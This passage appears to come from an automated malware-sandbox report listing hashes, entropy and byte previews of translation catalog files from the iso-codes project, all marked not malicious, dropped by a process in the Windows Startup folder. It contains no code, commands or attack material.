                                                                                                    SHA-512:FBD9A38677B264086461E564B96AF43F849CB23EC03C8AFE418B56A6C1394513A02F22DA7E86674633E067E1CA6909FF7C8625CF0B65BBBE35D018B16B479561
                                                                                                    Malicious:false
                                                                                                    Preview:................,.......<.......P.......Q...a...f................................Netherlands Antilles.Project-Id-Version: iso_3166-3.Report-Msgid-Bugs-To: https://salsa.debian.org/iso-codes-team/iso-codes/issues.PO-Revision-Date: 2006-10-18 22:59+0800.Last-Translator: Eric Pareja <xenos@upm.edu.ph>.Language-Team: Tagalog <debian-tl@banwa.upm.edu.ph>.Language: tl.MIME-Version: 1.0.Content-Type: text/plain; charset=UTF-8.Content-Transfer-Encoding: 8bit..Netherlands Antilles.
                                                                                                    Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scr
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 183 messages, Project-Id-Version: iso_15924 'Adlam'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):10222
                                                                                                    Entropy (8bit):5.141791432929215
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:192:dHRBeUF3HiltU4WjV9qWxa5hW81lNqNd0BXT6wq8FhgmYO:97Z3Cg4WjVDxa5hW81/uSBX2wqYhgw
                                                                                                    MD5:37DDB53EF944B05CE93BAF409F5F1D7D
                                                                                                    SHA1:D47DD9A7049C8B1F6A95E2255675B3DEDF34902E
                                                                                                    SHA-256:2C1C86D6996E5EF12D5F9F0499248CD82D457A31BB38517A61D95A5AD94F440D
                                                                                                    SHA-512:5E5641C088BC6385C544253448D16A338B68D0405FB0B8576A194E52F9CE97F8EEA79587694E565776DAE3E8682D4B471463AAEAAC7861827CDBACCBF0564B4A
                                                                                                    Malicious:false
                                                                                                    Preview:................................x.......y...................?...........................................................................%.......-.......7.......C.......P.......Y.......`.......h.......q.......w.......~.......................................................................................:.......B...&...K.......r...........(...........................................................'.......2.......9.......A.......G.......P.......Y.......s...........,...........................................................(.......9.......O...&...f...........4...........................................................#...............B.......V.......\.......c...#...u...............................................................................!.......'.......0.......9.......G.......L.......S.......Z.......c.......m.......................................................................................*...(...4.......].......f.......n...........-...............!...........................
                                                                                                    Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scr
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 426 messages, Project-Id-Version: iso_3166-1 'Afganistan'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):23676
                                                                                                    Entropy (8bit):5.090174703081091
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:384:F9k3DKSosINEPDNfruKfm546nbjz5wsWP48WAINiZGYoCf3EW:0oeDNfruKG48fmsWP48WAIEL
                                                                                                    MD5:62462B1AFD2C2521E878241CDE80E005
                                                                                                    SHA1:9D8B7691B8EF103E52B95EB480FD1F278602A417
                                                                                                    SHA-256:CABFFE58DD8242EC36D58C107A1762A428816CCB1350A4584E5AE22D4D19FCD7
                                                                                                    SHA-512:C0B4DF7BF3AF5B6AF038C047A40069A9988D4810F5575FA9528F000F9B28973E6C4F3ED8399EFB21CB9DFB40DAFAFB44B825078F7C19C9202FE64B855AB1E98D
                                                                                                    Malicious:false
                                                                                                    Preview:................l...9............#.......#.......#.......#.......#.......#.......#.......#.......#.......#.......$.......$......$$......7$......?$......E$......O$......W$......b$......j$......r$......}$.......$.......$.......$.......$.......$.......$.. ....$.......$.......$.. ....$.......%......3%......<%......J%......Q%......p%.......%.......%.......%.......%.......%.......%.......%.......%.......%.......%.......&.......&.......&.......&......%&......=&......F&......_&..,...{&.......&.......&..%....&.......&.......&.......&.......&.......'.......'.......'...... '......('..%...7'..,...]'.."....'..*....'.......'.......'.......'.......'.......(......!(......)(....../(......;(......M(......U(......](......f(......o(.......(..'....(..$....(.......(.......).......)......:)......Y)......w)......|).......).......).......).......).......).......).......).......).......).......).......*.......*.......*....../*......6*......@*......H*......S*......X*......b*......k*......r*.......*.......*......
                                                                                                    Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scr
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 1916 messages, Project-Id-Version: iso_3166-2 'A'ana'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):76675
                                                                                                    Entropy (8bit):4.975812813491527
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:1536:ftCevNZjLwI1OIeHP6RPu4/sIkhMf8yH6mP6gKYh:ftC+bWDNrMf8yHt6gKY
                                                                                                    MD5:F4320BA429D4614932ED2100E920C4EB
                                                                                                    SHA1:C269899A32A9506333125CAF1868E76E7D713A10
                                                                                                    SHA-256:630003EE1CE2A8D2457FF6B1953822673512EDCD8875F47683CC48E1D98E728E
                                                                                                    SHA-512:AAE5BCC0278884FE106F552EE2163C518678A37A5F21519ED09F5474FE2E610DB83898F748264A00D4EEB028BE1427F069E270EEFE89A2E0CB287360921D9C03
                                                                                                    Malicious:false
                                                                                                    Preview:........|........;.......w.......................................................................................................(...............8.......G.......W.......a.......g.......m.......v.......z...................................................................................................................".......6.......B.......Q.......[.......e.......m.......w.................................................................................................................................!.......).......0.......7.......@.......N.......[.......c.......j.......q.......z.............................................................................................................................#.......+.......2.......9.......E.......M.......Z.......f.......r.......y...........................................................................................................................................................%.......*......./.......:.......B.......
                                                                                                    Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scr
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 32 messages, Project-Id-Version: iso_3166-3 '\304\260ngiliz Antarktika B\303\266lgesi'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):2771
                                                                                                    Entropy (8bit):5.291246116955787
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:48:rLf3l8+AkOP+vGqIfdvqN5CoUvm5Qe9gmIax32MmDHqJJO:rLvl8+Bm+yaCo+kQyg6Z2P+JJO
                                                                                                    MD5:F22C77CB9C37F6FB77C20ADD26F907D1
                                                                                                    SHA1:C3974B99CC56740070025D9141FE5C673E05799E
                                                                                                    SHA-256:08D02EFA7B676961220D2F25DB359E2004BDBE8307443917F5550EF9F23CB623
                                                                                                    SHA-512:9D51771B835DEE57A35E49EAA221DA9FC306E77C7640A5DAE64430982E2644F617DD7150B15EECF6BF7792E59A9BFC20C9CD8E9574AF681FBAD91B0939F8831F
                                                                                                    Malicious:false
                                                                                                    Preview:........ ...........+.......................).......*...........:.../...W...........................................)...........................9.......I.......X.......m.......z...!....................................... .......)...........5... ...N.......o...2...{...+...............................$.......,...........%...0...B.......s.......{...........................'...........................(.......8.......H.......[.......l...$...{...........................................-.........../.......I.......h...!...t...*....................... ....................................................................................................................................................................British Antarctic Territory.Burma, Socialist Republic of the Union of.Byelorussian SSR Soviet Socialist Republic.Canton and Enderbury Islands.Czechoslovakia, Czechoslovak Socialist Republic.Dahomey.Dronning Maud Land.East Timor.France, Metropolitan.French Afars and Issas.French Southern
                                                                                                    Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scr
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 180 messages, Project-Id-Version: iso_4217 'ADB Hesap Birimi'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):9693
                                                                                                    Entropy (8bit):5.031914517427198
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:192:fqFH4qEI9s6VRyK0G/2LCntxa5GwB4lJjwoH/7HtfUFtIs:SdH7O6TL0G/Uo/a5JB4TD/7N0r
                                                                                                    MD5:E890321C599B8D465DF480C32E519C4A
                                                                                                    SHA1:D680A09AB65637F2B17DD8F8D675E4D998D82207
                                                                                                    SHA-256:7D252BE9AC78C6331249AFF194E6DE063854C9EAE8599B8EB1B0AEC0D965794B
                                                                                                    SHA-512:E7C59380F5BAFACB24C85A20829639D5A0E3B57033C6C3111FF93907563B4BB135C33B62D84E349B410DBB62D392E0E329769CF4741D4017CE50005FA22B4EBF
                                                                                                    Malicious:false
                                                                                                    Preview:........................\....... .......!.......5.......=.......L.......[.......i.......w...........................................................................................1...!...3...S...9.......7...................................$.......2.......B.......Q.......[.......m.......}...........0...................................................................9.......F.......M.......Z.......`.......o.......u...............................................................................................................%.......-.......;.......I.......Z.......b.......p.......}.......................................................................................................................................(.......5.......?.......D.......T.......b.......t...........!...................................................................................1.......D.......V.......i.......r.......................................................................................................
                                                                                                    Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scr
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 8007 messages, Project-Id-Version: iso_639-3 ''Are'are'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):343245
                                                                                                    Entropy (8bit):5.281022846965223
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:6144:h+91nCLObo84q0i5mqL3XXZo1wuGLMlxxEbFbFo3PnBx0a2ZcuJg5hVt6QSMkA:obpbRLQCFoBSa2O8kqfA
                                                                                                    MD5:5D1AA6F4ABACEC75F4CC191310E09329
                                                                                                    SHA1:4943F51F6BD2F12A8717EE15C2F0BF71A94E6478
                                                                                                    SHA-256:F58453CBAE686E0DE4F81241B5A5892A0A28320D3F3D9E60D82CEDB369A3FC2A
                                                                                                    SHA-512:2A7210FD2F3932A3BD980CAC74568E94EF31A12E759AB9A19F1E377BB4F0ACFB91FCB8E73DB44761D7E711F5A055BEE7A2979E58703685888CD8176EABDFE161
                                                                                                    Malicious:false
                                                                                                    Preview:........G.......T....)....................................................................................................................................................................................>.......C.......H.......N.......R......._.......d.......i.......n.......t.......|.................................................................................................................................................$.......*.......1.......7.......>.......B.......L.......Z.......h.......p.......v.......}.................................................................................................................................................. .......'.......+.......0.......5.......I.......a.......w....................................................................................................$...............5.......A.......F.......N.......S.......Z.......`.......h.......o.......w.......~...............................................................
                                                                                                    Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scr
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 116 messages, Project-Id-Version: iso_639-5 'Afrika-Asya dilleri'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):7390
                                                                                                    Entropy (8bit):4.88127789499328
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:192:4SDxNF5VGSE0BfNcamrHzQfLsxfvazO28Vj:XHnVJE0BfNcaYxGOhV
                                                                                                    MD5:BB4A718BE395D1F5937CE094EA89B84F
                                                                                                    SHA1:D3DF361F5CD67F8DCB30978956E47C3E1AF2BE9D
                                                                                                    SHA-256:E8D850FBF2D55E39CE22788495ECAF0C98DD7CF536E1FBB1DA86B5C506F48980
                                                                                                    SHA-512:33304880887BFB767E8DA37AC89115211BAA5E39FDDD37AAA3E9B6E592C07258686DFB3376A0224420BAEE8C8E81C2A953745A8AD1D8ABE5CBD64F597E1B32BC
                                                                                                    Malicious:false
                                                                                                    Preview:........t...............\............................................... .......5.......F.......W.......h.......{...............................................................&.......9.......I.......Y.......i.......y...................................!.......#...................2.......C.......T.......g.......x...$.......#.......%...........................".......:...#...P.......t.......................................................................*.......8.......H.......`.......w...............................................................................7.......G.......X.......h.......|...............................................................1.......J.......[.......l...............................................................................'.......9.......P.......a.......r...............................................................(.......9.......H.......Y.......j...........................#...........................................................................
                                                                                                    Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scr
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 344 messages, Project-Id-Version: iso_3166-1 '\303\204f\304\237\303\244nstan'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):18209
                                                                                                    Entropy (8bit):5.117187723119706
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:384:elUO91PrvvVfYzlDtbzMEpAayL8fP4PoJA5/m3LrXm0BX7:mvSxz3ilL8fP4PoJA5KLrXB97
                                                                                                    MD5:25DAB27160DA0971434BD22DB9F4ABDF
                                                                                                    SHA1:CD1E5D28EE72E602CDF5CF08CF0266E856FE8B21
                                                                                                    SHA-256:D07B59D6939C62F622411A5AC0DA7DA4CCBE96A88A8C9C9823D7DF5E8AE6F1FD
                                                                                                    SHA-512:B1BC8097144C6BD48C35F5AE35F6DFB9947F9D42A50409D082B0CB9C3E9DBD0143AFB6BA5A4F996AA77DF316BB7F79D3B103ADBED2A22D23EF3841A863D70236
                                                                                                    Malicious:false
                                                                                                    Preview:........X.......................................................................................................3.......J.......T.......g.......o.......u.......................................................................................................................................................6.......H.......Q.......^.......f.......o.......x...................................................................................%...................+.......6.......>.......C.......J.......Y.......h.......p.......y........................................................................................ ...... ......% ......- ......4 ......B ......S ......c ......i ......{ ....... ....... ....... ....... ....... ....... ....... ....... ....... ....... ....... ....... ....... ....... ....... .......!.......!.......!......$!......,!......G!......M!......W!......q!......v!......~!.......!.......!.......!.......!.......!.......!.......!.......!......."......."......."......*"......<"......
                                                                                                    Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scr
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 2 messages, Project-Id-Version: iso_3166-3 'Niderland Antill\303\244re'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):492
                                                                                                    Entropy (8bit):5.213320274750806
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:6:ilVWPyNNGYxA9Ct0vOuvP0NXzff6Qe/REcJOLqL2AFAtLqLBFlasXmBQ8KMW0YE1:iZ1xjt02Uki7/CqLLIqLXXmBQWiDFw
                                                                                                    MD5:43BD9CDC85E028BAE472C8C92FF3275A
                                                                                                    SHA1:B1B9B11264751BF7C570445939037390F35338E8
                                                                                                    SHA-256:1CA6936986B3AD1600DDC12AE88EA316129501C548AF52E3D1BFB00CA283439F
                                                                                                    SHA-512:504AF718ABA7C0BEA6959316D0D1B806E89EFDFA51C149B404E18B96EF84BC6F35FBEE587C2BEBE13362A6B273E1335B47A2E232EE924C1367EAE54BB48EE8F4
                                                                                                    Malicious:false
                                                                                                    Preview:................,.......<.......P.......Q...p...f................................Netherlands Antilles.Project-Id-Version: iso_3166-3.Report-Msgid-Bugs-To: https://salsa.debian.org/iso-codes-team/iso-codes/issues.PO-Revision-Date: 2005-10-21 15:11+0300.Last-Translator: Albert Fazl. <tatarish.l10n@gmail.com>.Language-Team: Tatarish <tatarish.l10n@gmail.com>.Language: tt@iqtelif.MIME-Version: 1.0.Content-Type: text/plain; charset=UTF-8.Content-Transfer-Encoding: 8bit..Niderland Antill.re.
                                                                                                    Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scr
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 150 messages, Project-Id-Version: iso_639-3 'Abxaz\303\247a'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):6381
                                                                                                    Entropy (8bit):4.712240195420643
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:96:kTlQrqjUlhjK4gn9mNNfh70wSASCtlmXMZ6klESJWSf+9AGV84b1kBTBDQy6na:erj0he4GAN0wSuWcZ+HSmHXqLDQ5na
                                                                                                    MD5:1A51977E372586D38702A33021BF38CB
                                                                                                    SHA1:849EA311F947613949A78CBE558776E46E1C28F2
                                                                                                    SHA-256:631C50538A9D0345F3477A4092E37751CE75BE0468A4BD6E53A48B16E0BFACDF
                                                                                                    SHA-512:97A5924F49FFBFC56795D538E884419CA506B4153BF30F1EBC9BE4F102790AE3377724EBF043E381C1C6C16FCE06771F2218826AD886D5F0BCA5E6536BA78BE6
                                                                                                    Malicious:false
                                                                                                    Preview:........................|.......................................................................................................'......./.......6.......A.......I.......Q.......Y.......`.......j.......r.......z.......................................................................................................................................................................".......).......1.......:.......@.......G.......N.......T.......^.......h.......l.......w...............................................................................................................................................................................'.......2.......;.......E.......M.......R.......X.......`.......g.......q.......w...............................................................................................................................................................).......1.......7.......>.......E.......O.......V.......f.......n.......x.......~.......................................
                                                                                                    Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scr
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 344 messages, Project-Id-Version: iso_3166-1 '\323\230\321\204\320\263\323\231\320\275\321\201\321\202\320\260\320\275'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):21810
                                                                                                    Entropy (8bit):5.354977761429232
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:384:elUO91Prvv4IvEpAayL8fP4PoJA5/mcYwO2ZmWydPTkcAq/Qf:mv4IcilL8fP4PoJA5hYwaWyxTk5q/6
                                                                                                    MD5:A4DDF657E1EC0AA0B73F9B414BE11390
                                                                                                    SHA1:2AC8EE5066AE3DC1DE269F928F2EFADF3F792025
                                                                                                    SHA-256:81D60E42FF70E2539EA70CB225B0951D8BF33F9886BEBAFE542EE884AA479B66
                                                                                                    SHA-512:9F4A00953509926433FE0D69B3705C1BAF6EADAF98F905002283F95CDFC1689D98D1CC6E31339F93076AE8688E7AA5D1411EFD41FF4516F0562313D8D78D69C8
                                                                                                    Malicious:false
                                                                                                    Preview:........X.......................................................................................................3.......J.......T.......g.......o.......u.......................................................................................................................................................6.......H.......Q.......^.......f.......o.......x...................................................................................%...................+.......6.......>.......C.......J.......Y.......h.......p.......y........................................................................................ ...... ......% ......- ......4 ......B ......S ......c ......i ......{ ....... ....... ....... ....... ....... ....... ....... ....... ....... ....... ....... ....... ....... ....... ....... .......!.......!.......!......$!......,!......G!......M!......W!......q!......v!......~!.......!.......!.......!.......!.......!.......!.......!.......!......."......."......."......*"......<"......
                                                                                                    Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scr
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 2 messages, Project-Id-Version: iso_3166-3 '\320\235\320\270\320\264\320\265\321\200\320\273\320\260\320\275\320\264 \320\220\320\275\321\202\320\270\320\273\320\273\323\231\321\200\320\265'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):501
                                                                                                    Entropy (8bit):5.413108571669986
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:12:iOdD1xjt02Uki7/CqLLIqLDoMXmBQWicQvQ:R5t0UiTCTZMXmCvQ
                                                                                                    MD5:71451C1EA205473B405A6D054024D858
                                                                                                    SHA1:CCE4FD4E14DFA6B69D35188C0C69A28E869F85C7
                                                                                                    SHA-256:F21E890F30BAAB6A57F20F44E4A95423AF4F172305AE7AF34709ED22140A06DD
                                                                                                    SHA-512:E9D27D7C49229B5BF6DB1AF02BED564A23188C11C469E407363A099B5D93C3EF47C942C413CD19E8BA71D86F618625BC9E1E8E321ED6DAA3E488DA17F67E7B5D
                                                                                                    Malicious:false
                                                                                                    Preview:................,.......<.......P.......Q...h...f...%............................Netherlands Antilles.Project-Id-Version: iso_3166-3.Report-Msgid-Bugs-To: https://salsa.debian.org/iso-codes-team/iso-codes/issues.PO-Revision-Date: 2005-10-21 15:11+0300.Last-Translator: Albert Fazl. <tatarish.l10n@gmail.com>.Language-Team: Tatarish <tatarish.l10n@gmail.com>.Language: tt.MIME-Version: 1.0.Content-Type: text/plain; charset=UTF-8.Content-Transfer-Encoding: 8bit........... ..........
                                                                                                    Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scr
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 150 messages, Project-Id-Version: iso_639-3 '\320\220\320\261\321\205\320\260\320\267\321\207\320\260'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):7206
                                                                                                    Entropy (8bit):4.980066008689041
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:96:kTlQrqjEHLZiD+O54BNfh70wSASCtlmXMZ6w9NBUlqxRljSPh51TrSuGd5zhfL7N:erjKSAN0wSuWcZHjBUwljKPSuGd5dfN
                                                                                                    MD5:8C044216759A6FD075E819FD15503047
                                                                                                    SHA1:656CEAB5067004625E807AB778867D70A9B16BE4
                                                                                                    SHA-256:CBC7769E33539026110C5BDDAF6C69B69AE1A73C5E68E95897C743A3262260FB
                                                                                                    SHA-512:6F74420EA4309FB47A36095653832A49D3A745232A5970DAE11299ED418A7C9270A5760163141CDD00DA60C20DEDC498F44A016C9684A935C004BF22DE1A7E3E
                                                                                                    Malicious:false
                                                                                                    Preview:........................|.......................................................................................................'......./.......6.......A.......I.......Q.......Y.......`.......j.......r.......z.......................................................................................................................................................................".......).......1.......:.......@.......G.......N.......T.......^.......h.......l.......w...............................................................................................................................................................................'.......2.......;.......E.......M.......R.......X.......`.......g.......q.......w...............................................................................................................................................................).......1.......7.......>.......E.......O.......V.......f.......n.......x.......~.......................................
                                                                                                    Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scr
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 7 messages, Project-Id-Version: iso_15924 'Tadlamit'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):798
                                                                                                    Entropy (8bit):5.281028546311157
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:12:i26d+qNuu06tHbLxCfVt02Uk1A/rkiLLO/4itbMXmBQWiOWIDLdPzuMv:m8l6NnCVt0U+gl/3MXmGIXdbn
                                                                                                    MD5:F58DAB8FB5BFF15DE46D28F114749CFD
                                                                                                    SHA1:D25294017E2D1899F2AF30DCFA3BB90A2BC4D365
                                                                                                    SHA-256:553BBD3F585C3550388BCEA20FE2AC751FAF098D00174B6BB22071F563EC27A7
                                                                                                    SHA-512:CF26C6D1F641C533B14EE9050147FABC5795EA09562D38C978EFEE9B3C0DAD94229E00F15766B8175F430E362AE483D059B6051BFFBB4A3D687C903CD01EAB39
                                                                                                    Malicious:false
                                                                                                    Preview:................T........................................................................................................................................................................Adlam.Afaka.Arabic.Batak.Bengali.Brahmi.Project-Id-Version: iso_15924.Report-Msgid-Bugs-To: https://salsa.debian.org/iso-codes-team/iso-codes/issues.PO-Revision-Date: 2021-04-30 13:31+0000.Last-Translator: Hakim Oubouali <hakim.oubouali.skr@gmail.com>.Language-Team: Tamazight (Central Atlas) <https://hosted.weblate.org/projects/iso-codes/iso-15924/tzm/>.Language: tzm.MIME-Version: 1.0.Content-Type: text/plain; charset=UTF-8.Content-Transfer-Encoding: 8bit.Plural-Forms: nplurals=2; plural=n >= 2 && (n < 11 || n > 99);.X-Generator: Weblate 4.7-dev..Tadlamit.Tafakayt.Ta..abt.Tabatakit.Tabangalit.Tabrahmit.
                                                                                                    Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scr
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 2 messages, Project-Id-Version: iso_3166-1 'Aruba'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):608
                                                                                                    Entropy (8bit):5.369629137604653
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:12:ib9+lXxLtt02Uk1A/rkiLLO/4F5jtbMXmBQWiOWIDLdVn:isXjt0U+gl/elMXmGIXdVn
                                                                                                    MD5:CB06EC38C80394E041E8130702503E3B
                                                                                                    SHA1:4934DC9B1523F83FA8FC246BC53FDED6C5EE9AA1
                                                                                                    SHA-256:E3B149A176220234E75036A776096831602ED6D6B4EFF70187BEA3801D13D8C5
                                                                                                    SHA-512:75DF4D80E805A48EF6C01C1E8F3EF49E0DE3108E95F0FB9EF5208ADEB9662A8D8237700B03686AB8AA618657C4BC0FC718CCC5936CB66392A7F1C91AFDECF497
                                                                                                    Malicious:false
                                                                                                    Preview:................,.......<.......P.......Q.......W.......Z........................Aruba.Project-Id-Version: iso_3166-1.Report-Msgid-Bugs-To: https://salsa.debian.org/iso-codes-team/iso-codes/issues.PO-Revision-Date: 2021-04-30 13:31+0000.Last-Translator: Hakim Oubouali <hakim.oubouali.skr@gmail.com>.Language-Team: Tamazight (Central Atlas) <https://hosted.weblate.org/projects/iso-codes/iso-3166-1/tzm/>.Language: tzm.MIME-Version: 1.0.Content-Type: text/plain; charset=UTF-8.Content-Transfer-Encoding: 8bit.Plural-Forms: nplurals=2; plural=n >= 2 && (n < 11 || n > 99);.X-Generator: Weblate 4.7-dev..Aruba.
                                                                                                    Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scr
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 1 message, Project-Id-Version: iso_4217
                                                                                                    Category:dropped
                                                                                                    Size (bytes):371
                                                                                                    Entropy (8bit):5.170174652753135
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:6:ilijcYYxkXCt0vOuvP0NXzffGGXkk/RcximC3XAF5ITGLbMXmBQ8KMW0YEi9:i4cxxRt02Ukx/iximCg5IT8bMXmBQWi9
                                                                                                    MD5:3472BF256E926ACCBAEEC0CD310BED25
                                                                                                    SHA1:5DC79072DED4058022A0ED58548F1C0DE7617E3B
                                                                                                    SHA-256:0F5B05386F71E0117530208517A790BA54978BCF27A94A112BAEFD5BF64344BD
                                                                                                    SHA-512:CF107EDDA6434594D98DD4AEE625DD7FF564D53DA8D0DFBE0119BCA0C5EF00F4C728C3CA144B50165B502033E44A61372D7656D5CA2B5DF949117947C95A2E2C
                                                                                                    Malicious:false
                                                                                                    Preview:................$.......,.......8...9...9................Project-Id-Version: iso_4217.Report-Msgid-Bugs-To: https://salsa.debian.org/iso-codes-team/iso-codes/issues.PO-Revision-Date: YEAR-MO-DA HO:MI+ZONE.Last-Translator: Automatically generated.Language-Team: none.Language: tzm.MIME-Version: 1.0.Content-Type: text/plain; charset=UTF-8.Content-Transfer-Encoding: 8bit..
                                                                                                    Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scr
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 419 messages, Project-Id-Version: iso_3166-1 '\330\246\330\247\331\201\330\272\330\247\331\206\331\211\330\263\330\252\330\247\331\206'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):29812
                                                                                                    Entropy (8bit):5.339129083674573
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:768:jhZicIEtoNItmsWP4XdAIRs1pSmh6lyZWPC:Lvnzs1pSg6iWPC
                                                                                                    MD5:C1B8C0731D7CFCD618E9599B265D8511
                                                                                                    SHA1:E2763BFA6CA87FCF87FD671D49CD09726C8D4EB6
                                                                                                    SHA-256:5D056DF8CF71F954D1075896B2E39444BED2230884358B788632CFEA0E59CC9F
                                                                                                    SHA-512:1D202C6EABB221997E8EC90C7F6E2647528E538E0CF35B0AF90D498EEA1CAB926193A06D5A0B11135A51CD6F9AD320AF84E11F7F95399E9494380218A5F8C8A7
                                                                                                    Malicious:false
                                                                                                    Preview:................4...3...L........#.......#......%#......-#......5#......D#......L#......S#......\#......g#......{#.......#.......#.......#.......#.......#.......#.......#.......#.......#.......#.......#.......#.......$.......$.......$.......$......#$.. ...*$......K$......S$.. ...s$.......$.......$.......$.......$.......$.......$.......$.......%.......%......'%....../%......:%......C%......L%......S%......b%......{%.......%.......%.......%.......%.......%.......%.......%..,....%...... &......(&..%....&......T&......a&......l&......t&......y&.......&.......&.......&.......&..%....&..,....&.."....'..*...%'......P'......X'......a'......j'......}'.......'.......'.......'.......'.......'.......'.......'.......'.......'.......(..'....(..$...9(......^(......z(.......(.......(.......(.......(.......(.......(.......).......)......")......2)......N)......T)......f)......m)......u)......}).......).......).......).......).......).......).......).......).......).......).......).......).......)......
                                                                                                    Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scr
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 31 messages, Project-Id-Version: iso_3166-3 '\330\246\333\225\331\206\332\257\331\204\331\211\331\212\333\225\331\206\331\211\332\255 \330\246\330\247\331\206\330\252\330\247\330\261\331\203\330\252\331\211\331\203\330\247\330\257\331\211\331\203\331\211 \330\252\333\225\333\213\333\225\331\204\331\211\331\203\331\211'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):3467
                                                                                                    Entropy (8bit):5.506974208239775
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:48:VADQIvDsFkivGqIfdvqNuoUo3K3XJG59PCHvfPCHxCH1S/D5RL3n0ZX4aSTu:qDQIvD8yBoda3ZtvqxCeP307eu
                                                                                                    MD5:7244C650A206202EF710A7918A8E5C6F
                                                                                                    SHA1:C544B9F5C91555DF841D587FD8BBE1B7A072118D
                                                                                                    SHA-256:F33981EC967BE0DB39223F5BBA372CD0891DA5B729D2C3D1515BF348A2C7C8FA
                                                                                                    SHA-512:03B16661DEFFBCF8FADFD2D10173E0A40447DF9071357CC77C9C53D1DA2D1C7E59AA55D3B971399D4D3F7E60BFA15B03F6C62ED53D6E3668047CEEF0CC49448D
                                                                                                    Malicious:false
                                                                                                    Preview:....................).......................).......*...........".../...?.......o.......w...........................)...........................!.......1.......@.......U.......b...!...o................................... .......)............... ...6.......W...2...c...................F...9...O.......h.......3...9...n...m...........................A..."...D...d..._.......>.......-...H.......v...........<.......................k.......$.......(.......................H.......S...M...........B...............?...)...!...i........................................................................................................................................................................British Antarctic Territory.Burma, Socialist Republic of the Union of.Byelorussian SSR Soviet Socialist Republic.Canton and Enderbury Islands.Czechoslovakia, Czechoslovak Socialist Republic.Dahomey.Dronning Maud Land.East Timor.France, Metropolitan.French Afars and Issas.French Southern and Antarctic Territori
                                                                                                    Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scr
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 183 messages, Project-Id-Version: iso_15924 '\320\260\320\264\320\273\320\260\320\274'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):12713
                                                                                                    Entropy (8bit):5.2995843129137405
                                                                                                    Encrypted:false
